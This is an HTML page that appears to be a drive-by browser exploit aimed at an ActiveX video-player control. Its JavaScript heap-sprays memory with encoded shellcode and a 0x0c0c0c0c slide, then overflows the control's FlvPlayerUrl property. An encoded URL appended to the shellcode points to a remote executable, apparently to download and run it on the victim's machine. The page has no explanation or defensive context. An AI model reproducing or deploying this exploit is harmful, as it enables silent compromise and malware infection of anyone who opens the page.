<html>
<object id="Silent" classid="clsid:F3E70CEA-956E-49CC-B444-73AFE593AD7F"></object>
<body>
<script type="text/jscript">function init() { document.write("");}window.onload = init;</script>

<SCRIPT language="JavaScript">
var xlkk0 = "%u6870%u7474%u3a70%u2f2f%u6168%u2e68%u646b%u3269%u2e33%u6e63%u752f%u7070%u6f61%u652e%u6578"
</SCRIPT>

<SCRIPT language="JavaScript">
var shellcode = unescape("%u4343"+"%u4343"+"%u4343" +
"%ua3e9%u0000%u5f00%ua164%u0030%u0000%u408b%u8b0c" +
"%u1c70%u8bad%u0868%uf78b%u046a%ue859%u0043%u0000" +
"%uf9e2%u6f68%u006e%u6800%u7275%u6d6c%uff54%u9516" +
"%u2ee8%u0000%u8300%u20ec%udc8b%u206a%uff53%u0456" +
"%u04c7%u5c03%u2e61%uc765%u0344%u7804%u0065%u3300" +
"%u50c0%u5350%u5057%u56ff%u8b10%u50dc%uff53%u0856" +
"%u56ff%u510c%u8b56%u3c75%u748b%u782e%uf503%u8b56" +
"%u2076%uf503%uc933%u4149%u03ad%u33c5%u0fdb%u10be" +
"%ud63a%u0874%ucbc1%u030d%u40da%uf1eb%u1f3b%ue775" +
"%u8b5e%u245e%udd03%u8b66%u4b0c%u5e8b%u031c%u8bdd" +
"%u8b04%uc503%u5eab%uc359%u58e8%uffff%u8eff%u0e4e" +
"%uc1ec%ue579%u98b8%u8afe%uef0e%ue0ce%u3660%u2f1a" +
xlkk0 );
</SCRIPT>

<SCRIPT language="JavaScript">
var helloworld2Address = 0x0c0c0c0c;
var hbshelloworld = 0x100000;
var payLoadSize = shellcode.length * 2;
var spraySlideSize = hbshelloworld - (payLoadSize+0x38);
var spraySlide = unescape("%u0D0D%u0D0D");
spraySlide = getSpraySlide(spraySlide,spraySlideSize);
heapBlocks = (helloworld2Address - 0x100000)/hbshelloworld;
memory = new Array();
for (i=0;i<heapBlocks;i++)
{
      memory = spraySlide + shellcode;
}

function getSpraySlide(spraySlide, spraySlideSize)
{
while (spraySlide.length*2<spraySlideSize)
{
    spraySlide += spraySlide;
}
spraySlide = spraySlide.substring(0,spraySlideSize/2/1);
return spraySlide;
}

var size_buff = 1070;
var x = unescape("%0c%0c%0c%0c");
while (x.length<size_buff) x += x;
Silent.FlvPlayerUrl = x;
</SCRIPT>

</boyd></html>